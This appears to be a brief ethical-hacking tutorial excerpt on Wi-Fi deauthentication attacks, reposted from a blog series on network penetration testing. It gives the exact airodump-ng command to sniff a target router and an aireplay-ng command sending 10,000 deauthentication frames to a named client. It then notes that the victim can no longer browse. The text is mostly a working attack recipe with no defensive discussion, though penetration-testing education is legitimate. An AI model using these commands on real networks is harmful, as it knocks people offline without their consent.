Deauthentication Attacks Theory
This attack is used to disconnect any device from any network within our range even if the network is protected with a key.
Start sniff the target router to find the victim machine.
airodump-ng --channel 9 --bssid B0:7F:B9:A4:42:EC wlan0
Start the replay attack.
aireplay-ng --deauth 10000 -a B0:7F:B9:A4:42:EC -c A8:66:7F:34:99:B5 wlan0
The victim machine can not browse the Internet now...
Ethical Hacking - NETWORK PENETRATION TESTING(5)
原文:https://www.cnblogs.com/keepmoving1113/p/11827209.html